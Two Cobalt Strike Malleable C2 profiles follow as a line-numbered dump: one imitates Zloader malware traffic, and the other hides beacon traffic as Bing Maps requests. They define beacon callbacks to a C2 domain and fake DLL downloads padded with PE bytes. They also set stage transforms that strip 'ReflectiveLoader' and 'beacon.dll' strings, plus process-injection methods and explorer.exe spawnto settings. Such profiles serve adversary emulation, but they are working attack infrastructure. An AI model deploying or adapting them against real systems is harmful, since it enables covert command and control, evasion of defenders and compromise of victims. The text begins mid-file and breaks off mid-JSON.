26 | set pipename_stager "scerpc"; | |
27 | ||
28 | ###TCP options### | |
29 | set tcp_port "8000"; | |
30 | ||
31 | ###SSL Options### | |
32 | ||
33 | #https-certificate { | |
34 | #set keystore ""; | |
35 | #set password ""; | |
36 | #} | |
37 | ||
38 | #https-certificate { | |
39 | # set C "US"; | |
40 | # set CN "whatever.com"; | |
41 | # set L "California"; | |
42 | # set O "whatever LLC."; | |
43 | # set OU "local.org"; | |
44 | # set ST "CA"; | |
45 | # set validity "365"; | |
46 | #} | |
47 | ||
48 | #code-signer { | |
49 | #set keystore "your_keystore.jks"; | |
50 | #set password "your_password"; | |
51 | #set alias "server"; | |
52 | #} | |
53 | ||
54 | ###HTTP-Config Block### | |
55 | #http-config { | |
56 | # set headers "Server, Content-Type"; | |
57 | # header "Content-Type" "text/html;charset=UTF-8"; | |
58 | # header "Server" "nginx"; | |
59 | # | |
60 | # set trust_x_forwarded_for "false"; | |
61 | #} | |
62 | ||
63 | ###HTTP-GET Block### | |
64 | ||
65 | http-get { | |
66 | ||
67 | set uri "/wp-content/themes/calliope/wp_data.php"; | |
68 | ||
69 | client { | |
70 | ||
71 | header "Accept" "*/*"; | |
72 | header "Host" "wmwifbajxxbcxmucxmlc.com"; | |
73 | header "Connection" "Keep-Alive"; | |
74 | ||
75 | ||
76 | metadata { | |
77 | ||
78 | base64url; | |
79 | prepend "SESSIONID="; | |
80 | header "Cookie"; | |
81 | ||
82 | } | |
83 | ||
84 | } | |
85 | ||
86 | server { | |
87 | header "Server" "nginx"; | |
88 | header "Content-Type" "application/x-msdos-program"; | |
89 | header "Connection" "close"; | |
90 | header "Last-Modified" "Fri, 24 Apr 2020 23:06:05 GMT"; | |
91 | header "ETag" "\"76200-5a41168e83140\""; | |
92 | header "Accept-Ranges" "bytes"; | |
93 | ||
94 | output { | |
95 | ||
96 | netbios; | |
97 | ||
98 | prepend "MZ......................@............................................. .!..L.!This program cannot be run in DOS mode. | |
99 | ||
100 | $.......PE..L...$..^...........!................9+....................................................@..................................$..P.......X...............................8...............................@............................................text............................... ..`.rdata..6N.......P..................@[email protected]...`[email protected]............@..............@[email protected]..............@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................h.........Y.....h.........Y.....h.........Y......D$..V........t V..........^.....D$..T$....H.......T$.....t$.R.P..T$..H.;J.u...;.u.........2.....................D$.;H.u | |
101 | ..;D$.u......2...........4.............QV.t$..D$...........t$........4...E..F......F.........:.u.3.QR.........^Y.....W.y...A..u.+._QR.........^Y.........4.............Q.D$...$....V.t$....u&j..F........F.....h.4......K.....^Y...PV.=.....^Y...........5.............QV.t$..D$......P....t$........4...E..F......F.........:.u.3.QR.........^Y.....W.y...A..u.+._QR.........^[email protected]..^[email protected]..^.......... | |
102 | 'R.......S...C..V.5 C..+....L$...C... | |
103 | ,R.........+R.....f.D$..P...W.="; | |
104 | ||
105 | append "p....D$...C.....C...D$$6....L$..........;.r.(.\"R.....+........@+....C....+.+.........5 C....!...u....C..k..+...U....+....f9T$.w............$R....E.......C..k | |
106 | .C.....v+..C...D$...C...D$..8....D$.+...C.......:.........&R.... | |
107 | \"R..........u...C....E......C.........* | |
108 | .C......L$.. | |
109 | ,R....@+ | |
110 | .C... | |
111 | .C.... | |
112 | 0R..It6..*t(......t............C.....D$.....:..C... .\\$............u...][email protected]..+\\$....L$.*.....L$.. | |
113 | ,R....@+......C...|$ Z...u... | |
114 | (R....+.......5 C...L$...T. | |
115 | ..|$ Z....9u... | |
116 | (R....+.......5 C...D$....@+L$..L$$....L$........=p..._^[...............S.$.U.l$.VW.{...;.......+.9|$..B|$.;.u.../9F........~...F.r...U......j......_..^][.............F.;.s..v.W.A.....tj.{..r....~..r*...(..u..~....r..._.....^][..._..^][..........t.W..+PQ.........~...~.r.....8..._^][.......8._..^][...hd........hd........hT....j...............S.\\$.V....tW.N....r.......;.rE...r........F...;.v1...r..t$.....+.SV.....^[....t$.....+.SV.....^[...W.|$....wz.F.;.s..v...W.!.....t\\.~..r(...&..u..~....r | |
117 | .._.....^[....._^[..........t.WSP.........~...~.r.....8..._^[.......8._..^[...hT....m..................V...L$.W.~.;.r{.T$...+.;.w!.~...N.r | |
118 | .._......^....._^.........tC.~..r.......+.S.....+.t.P...PS.........~...~.[r | |
119 | ....8..._^.......8._..^...hd....................U..j.h@...d.....P...SVW..0..3.P.E.d......e....u..E.........v....'.^..............;.v.......<.+.;.v.......O..E.....3..E...tF...w.Q.........E...u1......E..M..E.@.e.P.E........E..%.....}..E..u..E..]...tH.~..r1.../.u..~..r | |
120 | .6........j..F......F.....j.............t.SQP.........~..r | |
121 | .6.........E.......~..^....r........M.d. | |
122 | ....Y_^[..].......D$.3...t....w.P.,..........t............U...=..........t..M.9.t | |
123 | ....x..u.3.]..@.].U...=,.....(...t..M.9.t | |
124 | ....x..u.3.]..@.].U..V.u...............^]...U..V.u....A...........^]...U..V.u....&...........^]...U..V.u..........(.....^]...................U..V..............E..t.V.I...Y..^]...U..V........E..t.V.*...Y..^]...U.....j..E..E.....P.M..t...h.....E..E.....P.>....U......E..M..E..E.P.!...h.....E..E.....P......U......E..M..E..E.P.....h.....E..E.(...P......;"; | |
125 | ||
126 | print; | |
127 | } | |
128 | } | |
129 | } | |
130 | ||
131 | #HTTP-GET VARIANT | |
132 | http-get "variant_april24dll" { | |
133 | ||
134 | set uri "/files/april24.dll"; | |
135 | ||
136 | client { | |
137 | ||
138 | header "Accept" "*/*"; | |
139 | header "Host" "wmwifbajxxbcxmucxmlc.com"; | |
140 | header "Connection" "Keep-Alive"; | |
141 | ||
142 | ||
143 | metadata { | |
144 | ||
145 | base64url; | |
146 | prepend "SESSIONID="; | |
147 | header "Cookie"; | |
148 | ||
149 | } | |
150 | ||
151 | } | |
152 | ||
153 | server { | |
154 | header "Server" "nginx"; | |
155 | header "Content-Type" "application/x-msdos-program"; | |
156 | header "Connection" "close"; | |
157 | header "Last-Modified" "Fri, 24 Apr 2020 23:06:05 GMT"; | |
158 | header "ETag" "\"76200-5a41168e83140\""; | |
159 | header "Accept-Ranges" "bytes"; | |
160 | ||
161 | output { | |
162 | ||
163 | netbios; | |
164 | ||
165 | prepend "MZ......................@............................................. .!..L.!This program cannot be run in DOS mode. | |
166 | ||
167 | $.......PE..L...$..^...........!................9+....................................................@..................................$..P.......X...............................8...............................@............................................text............................... ..`.rdata..6N.......P..................@[email protected]...`[email protected]............@..............@[email protected]..............@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................h.........Y.....h.........Y.....h.........Y......D$..V........t V..........^.....D$..T$....H.......T$.....t$.R.P..T$..H.;J.u...;.u.........2.....................D$.;H.u | |
168 | ..;D$.u......2...........4.............QV.t$..D$...........t$........4...E..F......F.........:.u.3.QR.........^Y.....W.y...A..u.+._QR.........^Y.........4.............Q.D$...$....V.t$....u&j..F........F.....h.4......K.....^Y...PV.=.....^Y...........5.............QV.t$..D$......P....t$........4...E..F......F.........:.u.3.QR.........^Y.....W.y...A..u.+._QR.........^[email protected]..^[email protected]..^.......... | |
169 | 'R.......S...C..V.5 C..+....L$...C... | |
170 | ,R.........+R.....f.D$..P...W.="; | |
171 | ||
172 | append "p....D$...C.....C...D$$6....L$..........;.r.(.\"R.....+........@+....C....+.+.........5 C....!...u....C..k..+...U....+....f9T$.w............$R....E.......C..k | |
173 | .C.....v+..C...D$...C...D$..8....D$.+...C.......:.........&R.... | |
174 | \"R..........u...C....E......C.........* | |
175 | .C......L$.. | |
176 | ,R....@+ | |
177 | .C... | |
178 | .C.... | |
179 | 0R..It6..*t(......t............C.....D$.....:..C... .\\$............u...][email protected]..+\\$....L$.*.....L$.. | |
180 | ,R....@+......C...|$ Z...u... | |
181 | (R....+.......5 C...L$...T. | |
182 | ..|$ Z....9u... | |
183 | (R....+.......5 C...D$....@+L$..L$$....L$........=p..._^[...............S.$.U.l$.VW.{...;.......+.9|$..B|$.;.u.../9F........~...F.r...U......j......_..^][.............F.;.s..v.W.A.....tj.{..r....~..r*...(..u..~....r..._.....^][..._..^][..........t.W..+PQ.........~...~.r.....8..._^][.......8._..^][...hd........hd........hT....j...............S.\\$.V....tW.N....r.......;.rE...r........F...;.v1...r..t$.....+.SV.....^[....t$.....+.SV.....^[...W.|$....wz.F.;.s..v...W.!.....t\\.~..r(...&..u..~....r | |
184 | .._.....^[....._^[..........t.WSP.........~...~.r.....8..._^[.......8._..^[...hT....m..................V...L$.W.~.;.r{.T$...+.;.w!.~...N.r | |
185 | .._......^....._^.........tC.~..r.......+.S.....+.t.P...PS.........~...~.[r | |
186 | ....8..._^.......8._..^...hd....................U..j.h@...d.....P...SVW..0..3.P.E.d......e....u..E.........v....'.^..............;.v.......<.+.;.v.......O..E.....3..E...tF...w.Q.........E...u1......E..M..E.@.e.P.E........E..%.....}..E..u..E..]...tH.~..r1.../.u..~..r | |
187 | .6........j..F......F.....j.............t.SQP.........~..r | |
188 | .6.........E.......~..^....r........M.d. | |
189 | ....Y_^[..].......D$.3...t....w.P.,..........t............U...=..........t..M.9.t | |
190 | ....x..u.3.]..@.].U...=,.....(...t..M.9.t | |
191 | ....x..u.3.]..@.].U..V.u...............^]...U..V.u....A...........^]...U..V.u....&...........^]...U..V.u..........(.....^]...................U..V..............E..t.V.I...Y..^]...U..V........E..t.V.*...Y..^]...U.....j..E..E.....P.M..t...h.....E..E.....P.>....U......E..M..E..E.P.!...h.....E..E.....P......U......E..M..E..E.P.....h.....E..E.(...P......;"; | |
192 | ||
193 | print; | |
194 | } | |
195 | } | |
196 | } | |
197 | ||
198 | ###HTTP-Post Block### | |
199 | ||
200 | #parameters from a similar sample = https://github.com/tatsui-geek/malware-traffic-analysis.net/blob/master/2016-12-30-Sundown-EK-1st-run-sends-Terdot.A-Zloader.pcap | |
201 | http-post { | |
202 | ||
203 | set uri "/post.php"; | |
204 | #set verb "GET"; | |
205 | set verb "POST"; | |
206 | ||
207 | client { | |
208 | ||
209 | header "Accept" "*/*"; | |
210 | header "Cache-Control" "no-cache"; | |
211 | header "Host" "wmwifbajxxbcxmucxmlc.com"; | |
212 | header "Connection" "close"; | |
213 | ||
214 | ||
215 | output { | |
216 | base64url; | |
217 | parameter "FE8hVs3"; | |
218 | ||
219 | } | |
220 | ||
221 | id { | |
222 | base64url; | |
223 | parameter "id"; | |
224 | ||
225 | } | |
226 | } | |
227 | ||
228 | server { | |
229 | ||
230 | header "Server" "nginx"; | |
231 | header "Content-Type" "text/html; charset=UTF-8"; | |
232 | header "Connection" "close"; | |
233 | ||
234 | output { | |
235 | netbios; | |
236 | ||
237 | prepend "..\"N ......0.9..5......Tb....\"shb.fL.....t....u.......s...D.{...Qv&[email protected]$..y.q,P....Nn~..O .[..Lo..{.Z.....yKd.B..o.M>..J...~n.D0..Bm.:.Tx... [email protected]..!.%...BC.\\I.7C..U..X..D.4....h........'m......gXaQ..<.....X..]...%5.Fx.LO..D._I~.@$.R[..p...<"; | |
238 | ||
239 | append ">2...........{..\"..~=....._...Nu...s.mm.....u..lV..r......g2)r.w.'G2.*Y.i.,.9...o...t..zhX.h....K=........AS"; | |
240 | ||
241 | print; | |
242 | } | |
243 | } | |
244 | } | |
245 | ||
246 | ###HTTP-Stager Block### | |
247 | http-stager { | |
248 | ||
249 | set uri_x86 "/wp-content/themes/wp-front.php"; | |
250 | set uri_x64 "/wp-content/themes/wp_data.php"; | |
251 | ||
252 | client { | |
253 | ||
254 | header "Host" "wmwifbajxxbcxmucxmlc.com"; | |
255 | header "Connection" "Keep-Alive"; | |
256 | ||
257 | } | |
258 | ||
259 | server { | |
260 | ||
261 | header "Server" "nginx"; | |
262 | header "Content-Type" "text/html; charset=UTF-8"; | |
263 | header "Connection" "close"; | |
264 | ||
265 | output { | |
266 | ||
267 | print; | |
268 | } | |
269 | ||
270 | } | |
271 | } | |
272 | ||
273 | ||
274 | ###Malleable PE/Stage Block### | |
275 | ||
276 | #filled this out best I could. | |
277 | stage { | |
278 | set checksum "0"; | |
279 | set compile_time "16 Apr 2020 17:56:00"; | |
280 | set entry_point "170000"; | |
281 | set image_size_x86 "740000"; | |
282 | set image_size_x64 "740000"; | |
283 | #set name "WWanMM.dll"; | |
284 | set userwx "false"; | |
285 | set cleanup "false"; | |
286 | set sleep_mask "false"; | |
287 | set stomppe "false"; | |
288 | set obfuscate "false"; | |
289 | set rich_header ""; | |
290 | ||
291 | set sleep_mask "false"; | |
292 | ||
293 | #set module_x86 "wwanmm.dll"; | |
294 | #set module_x64 "wwanmm.dll"; | |
295 | ||
296 | transform-x86 { | |
297 | #prepend "\x90\x90\x90"; | |
298 | strrep "ReflectiveLoader" ""; | |
299 | strrep "beacon.dll" ""; | |
300 | } | |
301 | ||
302 | transform-x64 { | |
303 | #prepend "\x90\x90\x90"; | |
304 | strrep "ReflectiveLoader" ""; | |
305 | strrep "beacon.x64.dll" ""; | |
306 | } | |
307 | ||
308 | #from yara strings = https://github.com/k-vitali/Malware-Misc-RE/blob/master/2020-03-20-zloader-generic-yara-vk.yar | |
309 | string "{EE 03 00 00 E9 03 00 00 EE 03 00 00 EF 03 00 00 F0 03 00 00 EE 03 00 00 EE 03 00 00 EA 03 00 00 EC 03 00 00 EB 03 00 00 ED 03 00 00}"; | |
310 | string "{55 89 e5 53 57 56 8b ?? ?? 85 f6 74 ?? 8b ?? ?? 6a 00 53 e8 ?? ?? ?? ?? 83 c4 08 a8 01 75 ?? 8b ?? ?? ?? ?? ?? 89 f9 e8 ?? ?? ?? ?? 89 c1 0f ?? ?? 66 ?? ?? 66 ?? ?? 74 ?? bb 01 00 00 00 eb ?? 89 d8 99 f7 f9 0f ?? ?? ?? 8b ?? ?? 66 ?? ?? ?? 66 ?? ?? ?? 8d ?? ?? 74 ?? 8d ?? ?? 66 83 fa 5f 72 ?? 66 83 f8 0d 77 ?? ba 00 26 00 00 0f a3 c2 72 ?? eb ?? 31 f6 eb ?? 89 de eb ?? 8b ?? ?? 89 f0 5e 5f 5b 5d c3} | |
311 | "; | |
312 | ||
313 | } | |
314 | ||
315 | ###Process Inject Block### | |
316 | process-inject { | |
317 | ||
318 | #set allocator "NtMapViewOfSection"; | |
319 | ||
320 | set min_alloc "16700"; | |
321 | ||
322 | set userwx "false"; | |
323 | ||
324 | set startrwx "false"; | |
325 | ||
326 | transform-x86 { | |
327 | #prepend "\x90\x90\x90"; | |
328 | } | |
329 | transform-x64 { | |
330 | #prepend "\x90\x90\x90"; | |
331 | } | |
332 | ||
333 | execute { | |
334 | CreateThread; | |
335 | CreateRemoteThread; | |
336 | ||
337 | CreateThread "ntdll.dll!RtlUserThreadStart+0x1000"; | |
338 | ||
339 | SetThreadContext; | |
340 | ||
341 | NtQueueApcThread-s; | |
342 | ||
343 | #NtQueueApcThread; | |
344 | ||
345 | CreateRemoteThread "kernel32.dll!LoadLibraryA+0x1000"; | |
346 | ||
347 | RtlCreateUserThread; | |
348 | } | |
349 | } | |
350 | ||
351 | ###Post-Ex Block### | |
352 | post-ex { | |
353 | ||
354 | set spawnto_x86 "%windir%\\syswow64\\explorer.exe"; | |
355 | set spawnto_x64 "%windir%\\sysnative\\explorer.exe"; | |
356 | ||
357 | set obfuscate "false"; | |
358 | ||
359 | set smartinject "false"; | |
360 | ||
361 | set amsi_disable "false"; | |
362 | ||
363 | } |
0 | #bing maps profile | |
1 | #xx0hcd | |
2 | ||
3 | ###Global Options### | |
4 | set sample_name "bing_maps.profile"; | |
5 | ||
6 | set sleeptime "38500"; | |
7 | set jitter "27"; | |
8 | set useragent "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"; | |
9 | ||
10 | set host_stage "false"; | |
11 | ||
12 | ###DNS options### | |
13 | set dns_idle "8.8.8.8"; | |
14 | set maxdns "245"; | |
15 | set dns_sleep "0"; | |
16 | set dns_stager_prepend ""; | |
17 | set dns_stager_subhost ""; | |
18 | set dns_max_txt "252"; | |
19 | set dns_ttl "1"; | |
20 | ||
21 | ###SMB options### | |
22 | set pipename "ntsvcs"; | |
23 | set pipename_stager "scerpc"; | |
24 | set smb_frame_header ""; | |
25 | ||
26 | ###TCP options### | |
27 | set tcp_port "8000"; | |
28 | set tcp_frame_header ""; | |
29 | ||
30 | ###SSH BANNER### | |
31 | set ssh_banner "Welcome to Ubuntu 18.04.4 LTS (GNU/Linux 4.15.0-1065-aws x86_64)"; | |
32 | ||
33 | ###SSL Options### | |
34 | #https-certificate { | |
35 | # set keystore "domain001.store"; | |
36 | # set password "password123"; | |
37 | #} | |
38 | ||
39 | #code-signer { | |
40 | #set keystore "your_keystore.jks"; | |
41 | #set password "your_password"; | |
42 | #set alias "server"; | |
43 | #} | |
44 | ||
45 | ###HTTP-Config Block### | |
46 | #http-config { | |
47 | # set headers "Server, Content-Type"; | |
48 | # header "Content-Type" "text/html;charset=UTF-8"; | |
49 | # header "Server" "nginx"; | |
50 | # | |
51 | # set trust_x_forwarded_for "false"; | |
52 | #} | |
53 | ||
54 | ###HTTP-GET Block### | |
55 | http-get { | |
56 | ||
57 | set uri "/maps/overlaybfpr"; | |
58 | ||
59 | client { | |
60 | ||
61 | header "Host" "www.bing.com"; | |
62 | header "Accept" "*/*"; | |
63 | header "Accept-Language" "en-US,en;q=0.5"; | |
64 | header "Connection" "close"; | |
65 | ||
66 | ||
67 | metadata { | |
68 | base64; | |
69 | ||
70 | prepend "_SS="; | |
71 | prepend "SRCHD=AF=NOFORM;"; | |
72 | header "Cookie"; | |
73 | ||
74 | } | |
75 | ||
76 | parameter "q" "san%20diego%20ca%20zoo"; | |
77 | ||
78 | } | |
79 | ||
80 | server { | |
81 | ||
82 | header "Cache-Control" "public"; | |
83 | header "Content-Type" "text/html;charset=utf-8"; | |
84 | header "Vary" "Accept-Encoding"; | |
85 | header "P3P" "\"NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND\""; | |
86 | header "X-MSEdge-Ref" "Ref A: 20D7023F4A1946FEA6E17C00CC8216CF Ref B: DALEDGE0715"; | |
87 | header "Connection" "close"; | |
88 | ||
89 | output { | |
90 | ||
91 | base64; | |
92 | ||
93 | prepend "{ | |
94 | \"_type\": \"Suggestions\", | |
95 | \"instrumentation\": { | |
96 | \"pingUrlBase\": \"https://www.bing.com/api/ping?IG=22592B48742E48B7B855897EE3CA6400&CID=34823DAF741A65682A9032BA75E66427&ID=\", | |
97 | \"pageLoadPingUrl\": \"https://www.bing.com/api/ping/pageload?IG=22592B48742E48B7B855897EE3CA6400&CID=34823DAF741A65682A9032BA75E66427&Type=Event.CPT&DATA=0\" | |
98 | }, | |
99 | \"queryContext\": { | |
100 | \"originalQuery\": \"san diego ca zoo\" | |
101 | }, | |
102 | \"value\": [{ | |
103 | \"_type\": \"Place\", | |
104 | \"id\": \"sid:\""; | |
105 | ||
106 | ||
107 | ||
108 | ||
109 | ||
110 | append "\" | |
111 | \"readLink\": \"https://www.bing.com/api/v6/localentities/dbb1c326-5b67-4591-a264-0929e070e5ee\", | |
112 | \"readLinkPingSuffix\": \"DevEx,5018.1\", | |
113 | \"entityPresentationInfo\": { | |
114 | \"entityScenario\": \"ListItem\", | |
115 | \"entitySubTypeHints\": [\"PopulatedPlace\"] | |
116 | }, | |
117 | \"geo\": { | |
118 | \"latitude\": 32.7157, | |
119 | \"longitude\": -117.162 | |
120 | }, | |
121 | \"address\": { | |
122 | \"addressLocality\": \"San Diego\", | |
123 | \"addressSubregion\": \"San Diego County\", | |
124 | \"addressRegion\": \"California\", | |
125 | \"addressCountry\": \"United States\", | |
126 | \"countryIso\": \"US\", | |
127 | \"text\": \"San Diego, California\" | |
128 | }, | |
129 | \"formattingRuleId\": \"US\" | |
130 | }, { | |
131 | \"_type\": \"LocalBusiness\", | |
132 | \"id\": \"local_ypid:\"YN873x13020856635161814\"\", | |
133 | \"readLink\": \"https://www.bing.com/api/v6/localbusinesses/YN873x13020856635161814\", | |
134 | \"readLinkPingSuffix\": \"DevEx,5019.1\", | |
135 | \"name\": \"San Diego Zoo\", | |
136 | \"geo\": { | |
137 | \"latitude\": 32.7353, | |
138 | \"longitude\": -117.149 | |
139 | }, | |
140 | \"address\": { | |
141 | \"streetAddress\": \"2920 Zoo Dr\", | |
142 | \"addressLocality\": \"San Diego\", | |
143 | \"addressRegion\": \"CA\", | |
144 | \"postalCode\": \"92101\", | |
145 | \"addressCountry\": \"United States\", | |
146 | \"countryIso\": \"US\", | |
147 | \"text\": \"2920 Zoo Dr, San Diego, CA 92101\" | |
148 | }, | |
149 | \"formattingRuleId\": \"US\", | |
150 | \"categories\": [\"90000.90001.90012.90017\"] | |
151 | }, { | |
152 | \"_type\": \"Place\", | |
153 | \"id\": \"sid:\"63101d85-2568-910b-fee1-2518175b6a48\"\", | |
154 | \"readLink\": \"https://www.bing.com/api/v6/localentities/63101d85-2568-910b-fee1-2518175b6a48\", | |
155 | \"readLinkPingSuffix\": \"DevEx,5020.1\", | |
156 | \"entityPresentationInfo\": { | |
157 | \"entityScenario\": \"ListItem\", | |
158 | \"entitySubTypeHints\": [\"PopulatedPlace\"] | |
159 | }, | |
160 | \"geo\": { | |
161 | \"latitude\": 10.2573, | |
162 | \"longitude\": -67.9548 | |
163 | }, | |
164 | \"address\": { | |
165 | \"addressLocality\": \"San Diego\", | |
166 | \"addressRegion\": \"Carabobo\", | |
167 | \"addressCountry\": \"Venezuela\", | |
168 | \"countryIso\": \"VE\", | |
169 | \"text\": \"San Diego, Carabobo\" | |
170 | }"; | |
171 | ||
172 | ||
173 | print; | |
174 | } | |
175 | } | |
176 | } | |
177 | ||
178 | ||
179 | ||
180 | ###HTTP-Post Block### | |
181 | http-post { | |
182 | ||
183 | set uri "/fd/ls/lsp.aspx"; | |
184 | #set verb "GET"; | |
185 | set verb "POST"; | |
186 | ||
187 | client { | |
188 | ||
189 | header "Host" "www.bing.com"; | |
190 | header "Accept" "*/*"; | |
191 | header "Accept-Language" "en-US"; | |
192 | header "Content-Type" "text/xml"; | |
193 | header "Connection" "close"; | |
194 | ||
195 | output { | |
196 | base64url; | |
197 | ||
198 | prepend "SRCHUID="; | |
199 | prepend "SRCHD=AF=NOFORM;"; | |
200 | header "Cookie"; | |
201 | } | |
202 | ||
203 | id { | |
204 | base64url; | |
205 | parameter "lid"; | |
206 | ||
207 | } | |
208 | } | |
209 | ||
210 | server { | |
211 | ||
212 | header "Cache-Control" "public, max-age=31536000"; | |
213 | header "Content-Type" "application/json"; | |
214 | header "Vary" "Accept-Encoding"; | |
215 | header "X-Cache" "TCO_HIT"; | |
216 | header "Server" "Microsoft-IIS/10.0"; | |
217 | header "X-AspNet-Version" "4.0.30319"; | |
218 | header "X-Powered-By" "ASP.NET"; | |
219 | ||
220 | output { | |
221 | netbios; | |
222 | ||
223 | prepend "{ | |
224 | \"categoryMap\": [ | |
225 | { | |
226 | \"categoryId\": 91263, | |
227 | \"bucketId\": 1848, | |
228 | \"entry\": \"CommunityPoint\" | |
229 | }, | |
230 | { | |
231 | \"categoryId\": 90892, | |
232 | \"bucketId\": 1899, | |
233 | \"entry\": \"Transit\" | |
234 | }, | |
235 | { | |
236 | \"categoryId\": 90014, | |
237 | \"bucketId\": 300, | |
238 | \"entry\": \"ZXlJeE5DSTZleUoyWldOMGIzSkpiV0ZuWlNJNmV5SnlaV052Y21SeklqcGJleUp6WTJGc1pWQmhiR1YwZEdWTFpYbEpaQ0k2TFRFc0luTm9ZWEJsVUdGc1pYUjBaVXRsZVVsa0lqb3RNU3dpWjJWdmJXVjBjbmxUZEhKcGJtY2lPaUpOTWk0Mk56Z3NNVEJvTFRVdU16VTFWall1TlROb0xUTXVNalFnSUdNdE1DNDVPREVzTUM0d01qSXRNUzQzTlMwd0xqTTVOQzB5TGpFNE1TMHhMakE1TW1NdE1DNHpNamN0TUM0MU16TXRNQzQxT0RNdE1TNDBORElzTUM0d056SXRNaTQzTld3d0xqRXpOeTB3TGpJek1Xd3hMalU0T1MweUxqSXlNaUFnWXkwd0xqSTFOUzB3TGpFNE15MHdMalEyTmkwd0xqUXhPQzB3TGpZeE9TMHdMamN3TVdNdE1DNDBOREV0TUM0NE1Ua3RNQzR6TFRFdU56ZzJMREF1TkRFNExUSXVPRGN6YkRFdU5qTTVMVEl1TXpJell5MHdMakF6TXkwd0xqQTBOaTB3TGpBMkxUQXVNRGc1TFRBdU1EZzBMVEF1TVRNZ0lHTXRNQzR5TlMwd0xqUXlNeTB3TGpVM01TMHhMak14TlN3d0xqQTVPUzB5TGpVek4yd3lMamN6T0MwMExqRTVPRU10TVM0M05TMHhNeTR5TnkweExqQXlPQzB4TkN3d0xqQXhPQzB4TkdNd0xqWXdPU3d3TERFdU5EYzRMREF1TWpVMExESXVNVFU0TERFdU5EVTViREl1T0RFM0xEUXVPRGNnSUdNd0xqRXhOU3d3TGpRNE1pd3dMakE1TXl3eExqRTNPUzB3TGpJNE1Td3hMamM1T0d3eExqZzBOU3d5TGpZek0yTXdMalExT1N3d0xqY3pOU3d3TGpjd09Dd3hMamMyTWl3d0xqRTVOU3d5TGpZNE0wTTJMall4Tmkwd0xqTXhNeXcyTGpReE1pMHdMakExTVN3MkxqRXdPU3d3TGpFM01pQWdiREl1TURFekxESXVOemMwUXpndU5EUTFMRE11TlRjeExEZ3VOakU0TERRdU5UUXNPQzR4TWpZc05TNHpOemhqTFRBdU1qUXpMREF1TkRFekxUQXVPRFExTERFdU1URXpMVEl1TVRVc01TNHhOVFJJTWk0Mk56aFdNVEI2SWl3aVptbHNiRlpoYkhWbFNXUWlPakkwTENKemRISnZhMlZXWVd4MVpVbGtJam94TENKemRISnZhMlZYYVdSMGFDSTZNU3dpYzNSeWIydGxVMk5oYkdWUVlXeGxkSFJsUzJWNVNXUWlPaTB4TENKeVpXTnZjbVJVZVhCbElqb2lVR0YwYUNKOQ==\" | |
239 | }, | |
240 | { | |
241 | \"categoryId\": 90595, | |
242 | \"bucketId\": 311, | |
243 | \"entry\": \"RealEstatePoint\" | |
244 | }, | |
245 | { | |
246 | \"categoryId\": 91616, | |
247 | \"bucketId\": 257, | |
248 | \"entry\": \"AquariumPoint\" | |
249 | }, | |
250 | { | |
251 | \"categoryId\": 90954, | |
252 | \"bucketId\": 277, | |
253 | \"entry\": \"ArtGalleryPoint\" | |
254 | }, | |
255 | { | |
256 | \"categoryId\": 90001, | |
257 | \"bucketId\": 258, | |
258 | \"entry\": \"UEhOamNtbHdkQ0IwZVhCbFBTSjBaWGgwTDJwaGRtRnpZM0pwY0hRaUlHTnliM056YjNKcFoybHVQU0poYm05dWVXMXZkWE1pSUhOeVl6MGlMM0p3TDBScWNrUjZOMU5ZYlhOMWRYZHhRMlI1WldsdlFsWXpPWGhKV1M1bmVpNXFjeUkrUEM5elkzSnBjSFErUEhOamNtbHdkQ0IwZVhCbFBTSjBaWGgwTDJwaGRtRnpZM0pwY0hRaVBnPT0=\" | |
259 | }, | |
260 | { | |
261 | \"categoryId\": 90133, | |
262 | \"bucketId\": 278, | |
263 | \"entry\": \"ATMPoint\" | |
264 | }, | |
265 | { | |
266 | \"categoryId\": 90078, | |
267 | \"bucketId\": 330, | |
268 | \"entry\": \"AutomobileRepairPoint\" | |
269 | }, | |
270 | { | |
271 | \"categoryId\": 91186, | |
272 | \"bucketId\": 327, | |
273 | \"entry\": \"FoodPoint\" | |
274 | }, | |
275 | { | |
276 | \"categoryId\": 90122, | |
277 | \"bucketId\": 279, | |
278 | \"entry\": \"BankPoint\" | |
279 | }, | |
280 | { | |
281 | \"categoryId\": 90243, | |
282 | \"bucketId\": 284, | |
283 | \"entry\": \"BarPoint\" | |
284 | }, | |
285 | { | |
286 | \"categoryId\": 91204, | |
287 | \"bucketId\": 308, | |
288 | \"entry\": \"BarAndGrillPoint\" | |
289 | }, | |
290 | { | |
291 | \"categoryId\": 91576, | |
292 | \"bucketId\": 1851, | |
293 | \"entry\": \"AttractionPoint\" | |
294 | }, | |
295 | { | |
296 | \"categoryId\": 90353, | |
297 | \"bucketId\": 1972, | |
298 | \"entry\": \"ZXlKelkyRnNaVkJoYkdWMGRHVkxaWGxKWkNJNkxURXNJbk5vWVhCbFVHRnNaWFIwWlV0bGVVbGtJam90TVN3aVoyVnZiV1YwY25sVGRISnBibWNpT2lKTkxUSXVNalUwTFRZdU16ZzNZekFzTUMweExqZzJPU3d3TGpNd015MHhMakE0T1MweExqRXhPR3d5TGpjME1TMDBMakU1TTJNd0xEQXNNQzQxTkMweExqTXlMREV1TWpnMExEQnNNaTQyTkRNc05DNDBNeUFnWXpBc01Dd3dMakl5TVN3d0xqa3hOQzB4TGpBMk9Dd3dMamc0TVd3eUxqZzVOQ3cwTGpFek1XTXdMREFzTUM0M056TXNNUzR5TlMwd0xqazFNU3d4TGpJMVNETXVNVEUzYkRNdU5EZ3lMRFF1TnpReVl6QXNNQ3d3TGpVME1pd3hMakEwTkMwd0xqWTNOU3d4TGpBNE1rZ3dMamsyTkhZekxqUTJPQ0FnYUMweExqa3lOM1l0TXk0ME4yZ3ROQzQ1TlRSak1Dd3dMVEV1TXpJc01DNHhNamN0TUM0MU56WXRNUzR6TmpGc015NHlNelV0TkM0MU1qWm9MVEV1TlRjM1l6QXNNQzB4TGpJeE55d3dMakUyTlMwd0xqSXpOUzB4TGpNeU0wd3RNaTR5TlRRdE5pNHpPRGNpTENKbWFXeHNWbUZzZFdWSlpDSTZNalVzSW5OMGNtOXJaVlpoYkhWbFNXUWlPakVzSW5OMGNtOXJaVmRwWkhSb0lqb3hMQ0p6ZEhKdmEyVlRZMkZzWlZCaGJHVjBkR1ZMWlhsSlpDSTZMVEVzSW5KbFkyOXlaRlI1Y0dVaU9pSlFZWFJvSW4wPQ==\" | |
299 | }, | |
300 | { | |
